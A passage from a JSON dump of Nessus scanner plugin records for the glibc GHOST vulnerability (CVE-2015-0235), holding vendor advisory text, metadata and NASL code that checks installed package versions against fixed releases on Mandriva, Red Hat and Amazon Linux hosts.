'\\n Installed release : ' + ver_display +\n '\\n Fixed release : ' + fixed_ver +\n '\\n';\n security_hole(port:0, extra:report);\n}\nelse security_hole(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:23:29", "bulletinFamily": "scanner", "description": "A vulnerability has been discovered and corrected in glibc :\n\nHeap-based buffer overflow in the __nss_hostname_digits_dots function in glibc 2.2, and other 2.x versions before 2.18, allows context-dependent attackers to execute arbitrary code via vectors related to the (1) gethostbyname or (2) gethostbyname2 function, aka GHOST. (CVE-2015-0235)\n\nThe updated packages have been patched to correct this issue.", "modified": "2018-11-15T00:00:00", "id": "MANDRIVA_MDVSA-2015-039.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81280", "published": "2015-02-11T00:00:00", "title": "Mandriva Linux Security Advisory : glibc (MDVSA-2015:039)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:039. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81280);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:23\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"MDVSA\", value:\"2015:039\");\n\n script_name(english:\"Mandriva Linux Security Advisory : glibc (MDVSA-2015:039)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been discovered and corrected in glibc :\n\nHeap-based buffer overflow in the __nss_hostname_digits_dots function\nin glibc 2.2, and other 2.x versions before 2.18, allows\ncontext-dependent attackers to execute arbitrary code via vectors\nrelated to the (1) gethostbyname or (2) gethostbyname2 function, aka\nGHOST. 
(CVE-2015-0235)\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0092\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/10\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-devel-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"glibc-doc-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"glibc-doc-pdf-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-i18ndata-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-profile-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-static-devel-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-utils-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"nscd-2.14.1-12.11.mbs1\")) 
flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:23:23", "bulletinFamily": "scanner", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "modified": "2018-11-10T00:00:00", "id": "REDHAT-RHSA-2015-0092.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81034", "published": "2015-01-28T00:00:00", "title": "RHEL 6 / 7 : glibc (RHSA-2015:0092) (GHOST)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0092. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81034);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/11/10 11:49:54\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"RHSA\", value:\"2015:0092\");\n\n script_name(english:\"RHEL 6 / 7 : glibc (RHSA-2015:0092) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0092\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0092\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) 
flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-common-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-devel-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-static-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-common-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-debuginfo-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-debuginfo-common-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", 
reference:\"glibc-devel-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-headers-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-static-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-utils-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"nscd-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"nscd-2.17-55.el7_0.5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:23:23", "bulletinFamily": "scanner", "description": "A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call to either of these functions can use this flaw to execute arbitrary code with the permissions of the user running the application.\n\nSpecial notes :\n\nBecause of the exceptional nature of this security event, we have backfilled our 2014.03 and 2013.09 Amazon Linux AMI repositories with new glibc packages that fix CVE-2015-0235 .\n\nFor 2014.09 Amazon Linux AMIs, 'glibc-2.17-55.93.amzn1' addresses the CVE. 
Running 'yum clean all' followed by 'yum update glibc' will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2014.03 repositories, the same 'glibc-2.17-55.93.amzn1' addresses the CVE. Running 'yum clean all' followed by 'yum update glibc' will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2013.09 repositories, 'glibc-2.12-1.149.49.amzn1' addresses the CVE. Running 'yum clean all' followed by 'yum update glibc' will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2013.03, 2012.09, 2012.03, or 2011.09 repositories, run 'yum clean all' followed by 'yum\n--releasever=2013.09 update glibc' to install the updated glibc package. You should reboot your instance after installing the update.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a version of the Amazon Linux AMI that was part of our public beta, and we encourage you to move to a newer version of the Amazon Linux AMI as soon as possible.", "modified": "2018-06-27T00:00:00", "id": "ALA_ALAS-2015-473.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81024", "published": "2015-01-27T00:00:00", "title": "Amazon Linux AMI : glibc (ALAS-2015-473)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-473.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81024);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/06/27 18:42:24\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"ALAS\", value:\"2015-473\");\n\n script_name(english:\"Amazon Linux AMI : glibc 
(ALAS-2015-473)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call to either of these functions\ncan use this flaw to execute arbitrary code with the permissions of\nthe user running the application.\n\nSpecial notes :\n\nBecause of the exceptional nature of this security event, we have\nbackfilled our 2014.03 and 2013.09 Amazon Linux AMI repositories with\nnew glibc packages that fix CVE-2015-0235 .\n\nFor 2014.09 Amazon Linux AMIs, 'glibc-2.17-55.93.amzn1' addresses the\nCVE. Running 'yum clean all' followed by 'yum update glibc' will\ninstall the fixed package, and you should reboot your instance after\ninstalling the update.\n\nFor Amazon Linux AMIs 'locked' to the 2014.03 repositories, the same\n'glibc-2.17-55.93.amzn1' addresses the CVE. Running 'yum clean all'\nfollowed by 'yum update glibc' will install the fixed package, and you\nshould reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2013.09 repositories,\n'glibc-2.12-1.149.49.amzn1' addresses the CVE. Running 'yum clean all'\nfollowed by 'yum update glibc' will install the fixed package, and you\nshould reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2013.03, 2012.09, 2012.03, or\n2011.09 repositories, run 'yum clean all' followed by 'yum\n--releasever=2013.09 update glibc' to install the updated glibc\npackage. 
You should reboot your instance after installing the update.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a\nversion of the Amazon Linux AMI that was part of our public beta, and\nwe encourage you to move to a newer version of the Amazon Linux AMI as\nsoon as possible.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-473.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update glibc' to update your system. Note that you may need\nto run 'yum clean all' first. Once this update has been applied,\n'reboot your instance to ensure that all processes and daemons that\nlink against glibc are using the updated version'. On new instance\nlaunches, you should still reboot after cloud-init has automatically\napplied this update.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/AmazonLinux/release\")) audit(AUDIT_OS_NOT, \"Amazon Linux AMI\");\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\n# Checks for below glibc-2.17\nif (rpm_check(release:\"ALA\", reference:\"glibc-2.17-0.0.amzn1\"))\n{\n # Clean out initial report from first check\n __rpm_report = '';\n if (rpm_check(release:\"ALA\", reference:\"glibc-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-common-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-common-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", 
reference:\"glibc-devel-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-headers-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-static-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-utils-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"nscd-2.12-1.149.49.amzn1\")) flag++;\n}\nelse\n{\n # Checks for glibc-2.17\n # Clean out initial report from first check\n __rpm_report = '';\n if (rpm_check(release:\"ALA\", reference:\"glibc-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-common-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-common-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-devel-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-headers-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-static-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-utils-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"nscd-2.17-55.93.amzn1\")) flag++;\n}\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:25:05", "bulletinFamily": "scanner", "description": "A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. 
